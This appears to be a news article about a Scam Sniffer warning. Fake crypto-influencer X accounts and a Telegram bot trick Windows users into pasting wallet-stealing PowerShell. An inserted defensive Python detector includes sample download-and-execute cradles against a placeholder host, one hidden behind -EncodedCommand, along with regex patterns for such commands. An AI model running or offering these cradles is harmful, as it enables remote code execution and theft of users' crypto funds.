Scam Sniffer warns of fake influencers and Telegram bots spreading crypto-stealing malware

As a seasoned crypto investor with a few battle scars to show for it, I find these relentless attacks on our digital assets becoming as predictable as the rise and fall of the market itself. I’ve seen my fair share of scams, from pump-and-dump schemes to phishing attempts, but this latest one using fake influencer accounts and malicious Telegram bots is a new low.

Attackers are combining fake X accounts with a malicious Telegram bot to deliver cryptocurrency-stealing malware.

Security firm Scam Sniffer has issued an alert about a new scam targeting cryptocurrency users. The attackers impersonate well-known figures in the crypto space and then drain victims’ wallets with malware that many security products fail to catch.

The scammers start by creating fraudulent X accounts that impersonate well-known cryptocurrency influencers. They then promote Telegram groups that supposedly offer investment guidance. These groups are usually advertised as “exclusive”, and the invites are often posted as replies under the real influencer’s posts so that they appear authentic.

When a newcomer clicks the invite link, they are asked to verify themselves through a Telegram bot named “OfficialSafeguardBot”. According to Scam Sniffer, the bot manufactures urgency by giving the user only a short window to complete a captcha.

During this fake verification, the bot silently places malicious PowerShell commands (PowerShell is the scripting language used to automate tasks on Windows) onto the victim’s clipboard. The victim is then told that pasting and running those commands on their Windows machine is the final step of the verification. Because the victim executes the command themselves, it runs with their own privileges and never has to get past a download warning or an installer prompt.
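The verification step described above is a paste-and-run lure: whatever lands on the clipboard gets executed by the victim. The Python below is an added example, not Scam Sniffer’s code or anything recovered from this campaign, of the checks a clipboard guard or an EDR command-line rule can apply to such a command before it runs: a hidden window, an execution-policy bypass, a download cradle fed into Invoke-Expression, and, because attackers routinely hide the cradle behind -EncodedCommand, decoding that base64/UTF-16LE payload and scoring it as well. The sample commands, the inner script and every hostname are constructed placeholders.

```python
"""Heuristics for paste-and-run ("ClickFix"-style) PowerShell one-liners.

Added example, not Scam Sniffer's code. The sample strings are constructed to
resemble what such a bot might copy to a victim's clipboard; none is taken from
the campaign and every hostname is a placeholder (.invalid TLD).
"""
import base64
import re
from typing import Optional

# -EncodedCommand (and its abbreviations) takes base64 of a UTF-16LE script.
ENCODED = re.compile(r"-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# One hit per indicator; a real paste-and-run cradle usually trips several.
INDICATORS = [
    ("hidden_window",   re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("bypass_policy",   re.compile(r"-(ep|executionpolicy)\s+bypass", re.I)),
    ("encoded_command", ENCODED),
    ("download_cradle", re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I)),
    ("eval_expression", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("remote_url",      re.compile(r"https?://", re.I)),
]


def decode_encoded_command(blob: str) -> Optional[str]:
    """Recover the script hidden behind -EncodedCommand, or None if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmd: str) -> dict:
    """Return which indicators fire on cmd (and on any decoded inner script)."""
    hits = [name for name, pat in INDICATORS if pat.search(cmd)]
    decoded = None
    m = ENCODED.search(cmd)
    if m:
        decoded = decode_encoded_command(m.group(2))
        if decoded:
            # Score the inner script too; the attacker's cradle lives there.
            hits += ["decoded:" + h for h in score_command(decoded)["hits"]]
    # A lone URL or a lone hidden flag is not enough; two or more indicators is.
    return {"hits": hits, "decoded": decoded, "block": len(hits) >= 2}


# Constructed samples (not real campaign data). The last one wraps the cradle in
# -EncodedCommand, the way a bot would to slip past naive keyword filters.
INNER_SCRIPT = "iex (iwr http://example.invalid/v.ps1)"
SAMPLES = {
    "benign": r"Get-Date; Get-ChildItem ~\Downloads",
    "url_only": "Start-Process https://example.invalid/docs",
    "plain_cradle": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/verify.ps1)"',
    "encoded_cradle": "powershell -nop -w hidden -enc "
        + base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii"),
}


def scan_samples() -> dict:
    """Score every constructed sample; keyed by sample name."""
    return {name: score_command(cmd) for name, cmd in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        verdict = "BLOCK" if result["block"] else "allow"
        print(f"{verdict:5} {name}: {', '.join(result['hits']) or 'no indicators'}")
```

The threshold of two indicators is deliberate: a single URL or a single `-WindowStyle Hidden` appears in plenty of legitimate administrative one-liners, whereas a hidden window plus a download cradle, or a cradle behind -EncodedCommand, almost never does. Decoding the encoded payload matters because the outer command line of an encoded cradle shows nothing but base64 to a keyword-only rule.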

Scam Sniffer reports a rise in cases where attackers use this kind of lure to steal users’ private keys. Notably, the malware evades many antivirus products, although some engines on VirusTotal do flag it as malicious.

To protect themselves, users are advised to keep funds in a hardware wallet, never run commands they do not understand, and avoid installing software that has not been verified. The advice against running unfamiliar commands is the one that matters most here: no captcha or group verification ever legitimately requires pasting a command into a terminal.

The report is consistent with an earlier Scam Sniffer alert about a sharp increase in fraudulent X accounts during December. Impersonation accounts have risen by more than 87% since November, and two victims lost more than $3 million combined after clicking malicious links posted from some of these fake profiles.

Cybercriminals have recently been leaning more heavily on malware built to steal cryptocurrency. The escalation coincides with Bitcoin reaching $100,000 and a broad rally in altcoins, which makes the crypto market an increasingly attractive target for fraudsters.

On December 9, Cado Security Labs reported the Realst malware tricking users into infecting their own systems. Victims were socially engineered into downloading a fake meeting application, supposedly needed for a genuine business opportunity or for a call with a trusted contact.

Once installed, the malware quietly steals cryptocurrency assets, browser-saved credentials, bank card details and other sensitive information.

In October, the decentralized finance protocol Radiant Capital lost more than $50 million after several developers’ machines were compromised through a malicious PDF hidden inside a zip archive. The attack relied on social engineering: the infected file was sent over Telegram by an impostor posing as a trusted former contractor.


2024-12-11 10:45